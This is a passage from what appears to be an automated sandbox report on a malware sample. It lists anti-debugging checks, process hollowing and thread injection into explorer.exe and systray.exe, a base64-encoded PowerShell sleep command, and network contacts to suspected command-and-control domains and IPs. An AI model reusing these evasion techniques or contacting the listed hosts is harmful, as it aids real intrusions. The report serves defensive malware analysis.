          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01818DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01791DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01762D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_018214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01764F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0183070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01778794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01830EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01777E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01838ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01798E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01821608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\systray.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0040CEC3 LdrLoadDll,
          Source: C:\Users\user\Desktop\SC_0017384.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 54.85.86.211 80
          Source: C:\Windows\explorer.exeDomain query: www.myprojoints.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.152.24 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.131 80
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.229 80
          Source: C:\Windows\explorer.exeDomain query: www.metatv.app
          Source: C:\Windows\explorer.exeDomain query: www.findmyoriginstory.com
          Source: C:\Windows\explorer.exeDomain query: www.brunaeleandro.com
          Source: C:\Windows\explorer.exeDomain query: www.madisoncountylincoln.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.194.225 80
          Source: C:\Windows\explorer.exeDomain query: www.emprendizajesocial.com
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\SC_0017384.exeSection unmapped: C:\Windows\SysWOW64\systray.exe base address: EA0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\SC_0017384.exeSection loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Encrypted powershell cmdline option found
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: Base64 decoded start-sleep -seconds 20
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\SC_0017384.exeMemory written: C:\Users\user\Desktop\SC_0017384.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeMemory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeMemory written: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\SC_0017384.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\SC_0017384.exeThread register set: target process: 3324
          Source: C:\Windows\SysWOW64\systray.exeThread register set: target process: 3324
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess created: C:\Users\user\Desktop\SC_0017384.exe C:\Users\user\Desktop\SC_0017384.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeProcess created: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe
          Source: explorer.exe, 00000004.00000003.535831998.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.552222750.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.386659068.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000002.576565553.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.386129776.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.575675145.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Users\user\Desktop\SC_0017384.exe VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\SC_0017384.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
